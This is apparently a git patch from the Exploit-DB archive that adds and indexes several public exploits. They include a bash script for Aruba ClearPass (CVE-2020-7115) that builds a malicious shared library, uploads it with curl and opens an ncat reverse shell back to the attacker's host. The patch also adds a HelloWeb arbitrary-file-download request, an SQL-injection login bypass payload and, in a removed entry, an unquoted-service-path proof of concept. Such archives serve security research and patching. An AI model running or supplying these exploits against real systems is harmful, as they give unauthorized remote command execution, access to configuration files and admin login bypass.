From c0e7247938e883f17e115b55e9afe01fc7953617 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 11 Jul 2020 05:02:09 +0000
Subject: [PATCH] DB: 2020-07-11

5 changes to exploits/shellcodes

FrootVPN 4.8 - 'frootvpn' Unquoted Service Path

Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution

HelloWeb 2.0 - Arbitrary File Download

Barangay Management System 1.0 - Authentication Bypass
---
 exploits/asp/webapps/48659.txt   | 72 ++++++++++++++++++++++++++++++++
 exploits/linux/remote/48661.sh   | 49 ++++++++++++++++++++++
 exploits/php/webapps/48660.txt   | 42 +++++++++++++++++++
 exploits/windows/local/48657.txt | 40 ------------------
 files_exploits.csv               |  4 +-
 5 files changed, 166 insertions(+), 41 deletions(-)
 create mode 100644 exploits/asp/webapps/48659.txt
 create mode 100755 exploits/linux/remote/48661.sh
 create mode 100644 exploits/php/webapps/48660.txt
 delete mode 100644 exploits/windows/local/48657.txt

diff --git a/exploits/asp/webapps/48659.txt b/exploits/asp/webapps/48659.txt
new file mode 100644
index 000000000..abf6d05ec
--- /dev/null
+++ b/exploits/asp/webapps/48659.txt
@@ -0,0 +1,72 @@
+# Exploit Title: HelloWeb 2.0 - Arbitrary File Download
+# Date: 2020-07-09
+# Vendor Homepage: https://helloweb.co.kr/
+# Version: 2.0 [Latest] and previous versions
+# Exploit Author: bRpsd
+# Contact Author: cy[at]live.no
+# Google Dork: inurl:exec/file/download.asp
+# Type: WebApps / ASP
+-----------------------------------------------------
+
+
+
+Vulnerable code:
+######################################################################################################
+Dim filepath, filename, root_path, fso, root_folder, attachfile, objStream, strFile
+
+filepath = Request.QueryString("filepath")
+filename = Request.QueryString("filename")
+filepath = Replace(filepath,"/","\")
+
+root_path = server.MapPath("/")
+Set fso = CreateObject("Scripting.FileSystemObject")
+Set root_folder = fso.GetFolder(root_path)
+
+attachfile = root_path & filepath & "\" & filename
+
+Response.Clear
+Response.ContentType = "application/unknown"
+Response.AddHeader "Pragma", "no-cache"
+Response.AddHeader "Expires", "0"
+Response.AddHeader "Content-Transfer-Encoding", "binary"
+Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
+
+Set objStream = Server.CreateObject("ADODB.Stream")
+objStream.Open
+
+objStream.Type = 1
+objStream.LoadFromFile attachfile
+
+Response.BinaryWrite objStream.Read
+Response.Flush
+######################################################################################################
+
+Vulnerability: Arbitrary File Download
+Location: http://localhost/exec/file/download.asp
+Parameters: filename & filepath
+
+Proof of concept:
+
+GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+
+RESPONSE:
+HTTP/1.1 200 OK
+Cache-Control: private
+Pragma: no-cache
+Content-Type: application/unknown; Charset=utf-8
+Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
+Server:
+Content-Transfer-Encoding: binary
+Content-Disposition: attachment; filename = web.config
+Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
+Access-Control-Allow-Origin: *
+x-xss-protection: 1; mode=block
+Date: Thu, 09 Jul 2020 10:51:14 GMT
+Connection: close
\ No newline at end of file
diff --git a/exploits/linux/remote/48661.sh b/exploits/linux/remote/48661.sh
new file mode 100755
index 000000000..92c04f29f
--- /dev/null
+++ b/exploits/linux/remote/48661.sh
@@ -0,0 +1,49 @@
+# Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution
+# Date: 2020-07-06
+# Exploit Author: SpicyItalian
+# Vendor Homepage: https://www.arubanetworks.com/products/security/network-access-control/
+# Version: ClearPass 6.7.x prior to 6.7.13-HF, ClearPass 6.8.x prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1
+# Tested on: ClearPass 6.7.0
+# CVE: CVE-2020-7115
+
+Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine.
+
+#!/usr/bin/env bash
+
+if [ "$#" -ne 4 ]; then
+echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
+exit 0
+fi
+cat <<EOF >>payload.c
+#include <unistd.h>
+__attribute__((constructor))
+static void init() {
+execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
+}
+EOF
+
+gcc -fPIC -c payload.c
+gcc -shared -o payload.so -lcrypto payload.o
+rm -f payload.c payload.o
+curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &
+cat <<"EOF"
+
+/(\
+
+¡ !´\
+
+| )\ `.
+
+| `.) \,-,--
+
+( / /
+
+`'-.,;_/
+
+`----
+
+EOF
+
+printf "\nPleasea waita for your spicy shell...\n\n"
+
+ncat -v -l $3 $4
\ No newline at end of file
diff --git a/exploits/php/webapps/48660.txt b/exploits/php/webapps/48660.txt
new file mode 100644
index 000000000..5ebe21ff3
--- /dev/null
+++ b/exploits/php/webapps/48660.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Barangay Management System 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-07-05
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/13484/barangay-management-system.html
+# Software Link:  https://www.sourcecodester.com/sites/default/files/download/antiokz/barangay_1.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : index.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/Barangay/adminlogin.php
+
+POST /Barangay/adminlogin.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 74
+Referer: http://localhost/Barangay/
+Cookie: PHPSESSID=jt0a3e89ukmktgtuoedjqmktge
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+admin_name=%27%3D%27%27or%27&admin_pass=%27%3D%27%27or%27&adminlogin=Login: undefined
+
+HTTP/1.1 200 OK
+Date: Sat, 04 Jul 2020 20:35:25 GMT
+Server: Apache/2.4.39 (Win64) PHP/7.2.18
+X-Powered-By: PHP/7.2.18
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 3638
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/windows/local/48657.txt b/exploits/windows/local/48657.txt
deleted file mode 100644
index 00a41a3e9..000000000
--- a/exploits/windows/local/48657.txt
+++ /dev/null
@@ -1,40 +0,0 @@
-# Exploit	: FrootVPN 4.8 - 'frootvpn' Unquoted Service Path
-# Date		: 2020-07-09
-# Author	: v3n0m
-# Vendor	: https://frootvpn.com/
-# App Link	: https://frootvpn.com/en/download-client?platform=win
-# Version	: 4.8
-# Tested on	: Windows 10 Pro build 19041.329
-# Credits	: YOGYACARDERLINK, bejo6, Ika Atikasari
-
-# PoC:
-
-Microsoft Windows [Version 10.0.19041.329]
-(c) 2020 Microsoft Corporation. All rights reserved.
-
-C:\Users\HP>wmic service get name,pathname,startmode,StartName | findstr "FrootVPN"
-FrootVPN "C:\Program Files\FrootVPN\vpn.service.exe" Manual     LocalSystem           
-
-C:\Users\HP>sc qc frootvpn
-[SC] QueryServiceConfig SUCCESS
-
-SERVICE_NAME: frootvpn
-        TYPE               : 10  WIN32_OWN_PROCESS
-        START_TYPE         : 3   DEMAND_START
-        ERROR_CONTROL      : 1   NORMAL
-        BINARY_PATH_NAME   : "C:\Program Files\FrootVPN\vpn.service.exe"
-        LOAD_ORDER_GROUP   :
-        TAG                : 0
-        DISPLAY_NAME       : FrootVPN
-        DEPENDENCIES       :
-        SERVICE_START_NAME : LocalSystem
-
-C:\Users\HP>
-
-
-# Security Risk
-
-A successful attempt would require the local user to be able to insert their code 
-in the system root path undetected by the OS or other security applications 
-where it could potentially be executed during application startup or reboot. 
-If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c7033d76d..103e96a81 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11120,7 +11120,6 @@ id,file,description,date,author,type,platform,port
 48625,exploits/windows/local/48625.txt,"KiteService 1.2020.618.0 - Unquoted Service Path",2020-06-26,"Marcos Antonio León",local,windows,
 48628,exploits/windows/local/48628.py,"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)",2020-07-01,"Paras Bhatia",local,windows,
 48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware,
-48657,exploits/windows/local/48657.txt,"FrootVPN 4.8 - 'frootvpn' Unquoted Service Path",2020-07-09,v3n0m,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18210,6 +18209,7 @@ id,file,description,date,author,type,platform,port
 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,
 48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware,
 48650,exploits/xml/remote/48650.txt,"Microsoft Windows mshta.exe 2019 - XML External Entity Injection",2020-07-07,hyp3rlinx,remote,xml,
+48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42908,4 +42908,6 @@ id,file,description,date,author,type,platform,port
 48653,exploits/hardware/webapps/48653.txt,"BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password)",2020-07-08,"William Summerhill",webapps,hardware,
 48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,
 48656,exploits/php/webapps/48656.txt,"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting",2020-07-09,mqt,webapps,php,
+48659,exploits/asp/webapps/48659.txt,"HelloWeb 2.0 - Arbitrary File Download",2020-07-10,bRpsd,webapps,asp,
 48658,exploits/php/webapps/48658.txt,"Savsoft Quiz 5 - Persistent Cross-Site Scripting",2020-07-09,th3d1gger,webapps,php,
+48660,exploits/php/webapps/48660.txt,"Barangay Management System 1.0 - Authentication Bypass",2020-07-10,BKpatron,webapps,php,